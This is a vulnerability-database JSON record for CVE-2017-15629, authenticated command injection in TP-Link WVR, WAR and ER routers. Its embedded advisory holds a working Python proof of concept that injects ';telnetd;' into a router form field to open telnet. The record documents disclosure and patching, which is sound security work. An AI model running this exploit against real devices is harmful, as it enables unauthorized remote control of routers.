    "data": "TP-Link WVR, WAR and ER devices allow remote authenticated administrators to execute arbitrary commands via command injection in the new-tunnelname variable in the pptp_client.lua file. TP-Link WVR , WAR ,and ER The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. TP-LinkWVR, WAR and ERdevices are different series of router products from China TP-LINK. Security vulnerabilities exist in TP-LinkWVR, WAR, and ER devices. \nThese vulnerabilities can be triggered in LAN and WAN(if the \"remote management\" function is enabled). \n\n\nVulnerability Type:\n================\nCommand Injection (Authenticated)\n\n\nProduct:\n================\nWe has tested these vulnerabilities on TL-WVR450L(the latest version is TL-WVR450L V1.0161125) and TL-WVR900G(TL-WVR900G V3.0_170306). \nAnd the following model should also be affected and the vendor has confirmed:\nTP-Link ER5110G,\nTP-Link ER5120G,\nTP-Link ER5510G,\nTP-Link ER5520G,\nTP-Link R4149G,\nTP-Link R4239G,\nTP-Link R4299G,\nTP-Link R473GP-AC,\nTP-Link R473G,\nTP-Link R473P-AC,\nTP-Link R473,\nTP-Link R478G+,\nTP-Link R478,\nTP-Link R478+,\nTP-Link R483G,\nTP-Link R483,\nTP-Link R488,\nTP-Link WAR1300L,\nTP-Link WAR1750L,\nTP-Link WAR2600L,\nTP-Link WAR302,\nTP-Link WAR450L,\nTP-Link WAR450,\nTP-Link WAR458L,\nTP-Link WAR458,\nTP-Link WAR900L,\nTP-Link WVR1300G,\nTP-Link WVR1300L,\nTP-Link WVR1750L,\nTP-Link WVR2600L,\nTP-Link WVR300,\nTP-Link WVR302,\nTP-Link WVR4300L,\nTP-Link WVR450L,\nTP-Link WVR450,\nTP-Link WVR458L,\nTP-Link WVR900G,\nTP-Link WVR900L\n\n\nCVE details:\n================\nThe detail of each vulnerability are as follows:\nCVE-2017-15613: new-interface variable in the cmxddns.lua file\nCVE-2017-15614: new-outif variable in the pptp_client.lua file\nCVE-2017-15615: lcpechointerval variable in the pptp_client.lua file\nCVE-2017-15616: new-interface variable 
in the phddns.lua file\nCVE-2017-15617: iface variable in the interface_wan.lua file\nCVE-2017-15618: new-enable variable in the pptp_client.lua file\nCVE-2017-15619: pptphellointerval variable in the pptp_client.lua file\nCVE-2017-15620: new-zone variable in the ipmac_import.lua file\nCVE-2017-15621: olmode variable in the interface_wan.lua file\nCVE-2017-15622: new-mppeencryption variable in the pptp_client.lua file\nCVE-2017-15623: new-enable variable in the pptp_server.lua file\nCVE-2017-15624: new-authtype variable in the pptp_server.lua file\nCVE-2017-15625: new-olmode variable in the pptp_client.lua file\nCVE-2017-15626: new-bindif variable in the pptp_server.lua file\nCVE-2017-15627: new-pns variable in the pptp_client.lua file\nCVE-2017-15628: lcpechointerval variable in the pptp_server.lua file\nCVE-2017-15629: new-tunnelname variable in the pptp_client.lua file\nCVE-2017-15630: new-remotesubnet variable in the pptp_client.lua file\nCVE-2017-15631: new-workmode variable in the pptp_client.lua file\nCVE-2017-15632: new-mppeencryption variable in the pptp_server.lua file\nCVE-2017-15633: new-ipgroup variable in the session_limits.lua file\nCVE-2017-15634: name variable in the wportal.lua file\nCVE-2017-15635: max_conn variable in the session_limits.lua file\nCVE-2017-15636: new-time variable in the webfilter.lua file\nCVE-2017-15637: pptphellointerval variable in the pptp_server.lua file\n\n\nCredits:\n================\nchunibalon, puzzor @VARAS of IIE\n\n\nTimeline:\n================\n2017.08 to 2017.09: Issues found. \n2017.09.26: Vendor contacted. \n2017.10.13: Vendor confirmed. \n2017.10.14: CVE id requested. \n2017.10.19: CVE id assigned. \n2018.1: Vendor confirmed that all effected products have been fixed. \n\n\nVulnerability detail:\n================\nThese vulnerability are caused by the similar reason, so here is an explanation of CVE-2017-15616. \nOther vulnerabilities can be reproduced with the detail descriptions of the variable and lua file. 
\n\nIn /usr/lib/lua/luci/controller/admin/phddns.lua file, line 113:\n***********************************\nfunction add_phddns(http_form)\n    local form_data = json.decode(http_form.data)\n    local jdata = form_data.params.new\n\n    ret = form:insert(CONFIG_NAME, \"phddns\", jdata, RULE_KEYS, nil)\n\n    if not ret then\n        return false, err.ERR_COM_TABLE_ITEM_UCI_ADD\n    end\n\n    if not uci_r:commit(CONFIG_NAME) then\n        return false, err.ERR_COM_UCI_COMMIT\n    end\n\n        -- add the ref of interface\n    ifs.update_if_reference(jdata.interface, 1)\n\n    sys.fork_exec(\u0027/etc/init.d/phddns restart\u0027)\n    userconfig.cfg_modify()\n\n    return jdata\nend\n***********************************\nThis file will process a POST request from the web management panel with url \"ip/cgi-bin/luci/;stok=xxx/admin/phddns?form=phddns\". \nThe interface argument passed by the POST request can be set with the malformed command payload and the lua file didn\u0027t check the argument sufficiently. \nThen the malformed value of \"interface\" argument causes the command injection vulnerability. \n\n\nPoC file:\n================\n***********************************\nimport requests\nimport urllib\nimport json\n\n\n# This is the PoC code of authenticated command injection of TP-Link WVR900G router with the CVE-2017-15616. 
\n# To reproduce the PoC, the ip of the router should be 192.168.123.1 and the password of web management panel should be \u0027adminadmin\u0027\n\nPASSWORD = \u0027c6564879eda92681404fb4ce64343788e47d266c490bb9d574f4467644a2f96b73ec157bbffabb50752c46f55d026ec7ef34661d7dcb030b0b1fa527173093ae4358f4740e539322f58c441ea0003978475346fb66320f749cc138f867bc0d8d9501f1613524fbba565979d95df6ef412837dee15a6dd8867d00b91c6f4a3406\u0027\nBASEURL = \u0027http://192.168.123.1\u0027\nLOGINURL = BASEURL + \u0027/cgi-bin/luci/;stok=/login?form=login\u0027\n\n\nMARK = \u0027###\u0027\nVULURL = BASEURL + \u0027/cgi-bin/luci/;stok=%s/admin/phddns?form=phddns\u0027 % (MARK)\n\nheaders = {\n    \"Accept\": \"application/json, text/javascript, */*; q=0.01\",\n    \"Accept-Encoding\": \"gzip, deflate\",\n    \"Accept-Language\": \"zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4\",\n    \"Connection\": \"keep-alive\",\n    \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\",\n    \"Host\": BASEURL[7:],\n    \"Origin\": BASEURL,\n    \"Referer\": \"%s/webpages/login.html\" % (BASEURL),\n    \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36\",\n    \"X-Requested-With\": \"XMLHttpRequest\"\n}\n\nlogin_data_value = {\u0027method\u0027: \u0027login\u0027,\u0027params\u0027: {\u0027password\u0027: PASSWORD,\u0027username\u0027: \u0027admin\u0027}}\nlogin_data = {\u0027data\u0027:json.dumps(login_data_value)}\ns = requests.Session()\ns.headers.update(headers)\nprint (LOGINURL)\nprint (login_data)\nres = s.post(LOGINURL, data=login_data)\nstok = eval(res.text)[\u0027result\u0027][\u0027stok\u0027]\nprint \u0027[*] stok is %s\u0027 % (stok)\n\ntmp_vul = VULURL.replace(MARK, stok)\nprint \u0027[*] vul_url is %s \u0027 % (tmp_vul)\n\ndelete_data = {\"method\":\"delete\",\"params\":{\"key\":\"key-0\",\"index\":\"0\"}}\ndelete_data = {\u0027data\u0027: json.dumps(delete_data)}\nprint \u0027[+] delete existed 
rule\u0027\nres = s.post(tmp_vul, data=delete_data)\nprint \u0027[*] response is: %s\u0027 % (res.text)\n\n# after executing this payload, the router will open its telnetd service. \npayload = \u0027\u0027\u0027;telnetd;\u0027\u0027\u0027\nvul_data = {\"method\":\"add\",\"params\":{\"index\":0,\"old\":\"add\",\"new\":{\"interface\":\"WAN1%s\" % (payload),\"name\":\"test1\",\"passwd\":\"test\",\"enable\":\"on\"},\"key\":\"add\"}}\n\nvul_data = {\u0027data\u0027: json.dumps(vul_data)}\nprint \u0027[+] sending payload\u0027\nres = s.post(tmp_vul, data=vul_data)\nprint \u0027[*] response is: %s\u0027 % (res.text)\n***********************************\n\n\nReference:\n================\nhttps://github.com/chunibalon/Vulnerability/blob/master/CVE-2017-15613_to_CVE-2017-15637.txt\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-15629"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011946"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-02034"
      },
      {
        "db": "VULHUB",
        "id": "VHN-106470"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-15629"
      },
      {
        "db": "PACKETSTORM",
        "id": "145823"
      }
    ],
    "trust": 2.43
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-15629",
        "trust": 3.3
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011946",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201710-902",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-02034",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "145823",
        "trust": 0.2
      },
      {
        "db": "VULHUB",
        "id": "VHN-106470",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-15629",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-02034"
      },
      {
        "db": "VULHUB",
        "id": "VHN-106470"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-15629"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011946"
      },
      {
        "db": "PACKETSTORM",
        "id": "145823"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201710-902"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-15629"
      }
    ]
  },
  "id": "VAR-201801-0554",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-02034"
      },
      {
        "db": "VULHUB",
        "id": "VHN-106470"
      }
    ],
    "trust": 1.2804204167999997
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-02034"
      }
    ]
  },
  "last_update_date": "2024-11-23T21:39:57.583000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.tp-link.com/us/"
      },
      {
        "title": "Patch for TP-LinkWVR, WAR, and ER device arbitrary command execution vulnerability (CNVD-2018-02034)",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/114579"
      },
      {
        "title": "TP-Link WVR , WAR  and ER Repair measures for device security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=90684"
      },
      {
        "title": "Awesome CVE PoC",
        "trust": 0.1,
        "url": "https://github.com/lnick2023/nicenice "
      },
      {
        "title": "Awesome CVE PoC",
        "trust": 0.1,
        "url": "https://github.com/xbl3/awesome-cve-poc_qazbnm456 "
      },
      {
        "title": "Awesome CVE PoC",
        "trust": 0.1,
        "url": "https://github.com/qazbnm456/awesome-cve-poc "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-02034"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-15629"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011946"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201710-902"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-noinfo",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-77",
        "trust": 0.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-106470"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011946"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-15629"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "https://github.com/chunibalon/vulnerability/blob/master/cve-2017-15613_to_cve-2017-15637.txt"
      },
      {
        "trust": 1.8,
        "url": "http://www.securityfocus.com/archive/1/541655/100/0/threaded"
      },
      {
        "trust": 1.4,
        "url": "http://www.securityfocus.com/archive/1/archive/1/541655/100/0/threaded"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-15629"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-15629"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://packetstormsecurity.com/files/145823/tp-link-remote-command-injection.html"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/qazbnm456/awesome-cve-poc"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-15631"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.123.1\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-15624"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-15622"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-15613"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-15626"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-15619"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-15632"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-15615"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-15635"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-15620"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-15637"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-15618"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-15636"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-15614"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-15621"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-15630"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-15616"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-15633"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-15617"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-15627"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-15623"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-15634"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-15628"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-15625"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-02034"
      },
      {
        "db": "VULHUB",
        "id": "VHN-106470"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-15629"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011946"
      },
      {
        "db": "PACKETSTORM",
        "id": "145823"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201710-902"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-15629"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-02034"
      },
      {
        "db": "VULHUB",
        "id": "VHN-106470"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-15629"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011946"
      },
      {
        "db": "PACKETSTORM",
        "id": "145823"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201710-902"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-15629"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-01-26T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2018-02034"
      },
      {
        "date": "2018-01-11T00:00:00",
        "db": "VULHUB",
        "id": "VHN-106470"
      },
      {
        "date": "2018-01-11T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-15629"
      },
      {
        "date": "2018-02-06T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-011946"
      },
      {
        "date": "2018-01-11T02:59:14",
        "db": "PACKETSTORM",
        "id": "145823"
      },
      {
        "date": "2017-10-20T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201710-902"
      },
      {
        "date": "2018-01-11T16:29:01.097000",
        "db": "NVD",
        "id": "CVE-2017-15629"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-01-26T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2018-02034"
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULHUB",
        "id": "VHN-106470"
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-15629"
      },
      {
        "date": "2018-02-06T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-011946"
      },
      {
        "date": "2019-10-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201710-902"
      },
      {
        "date": "2024-11-21T03:14:54.237000",
        "db": "NVD",
        "id": "CVE-2017-15629"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "145823"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201710-902"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "plural  TP-Link Command injection vulnerability in devices",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011946"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "command injection",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201710-902"
      }
    ],
    "trust": 0.6
  }
}


Sightings


Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.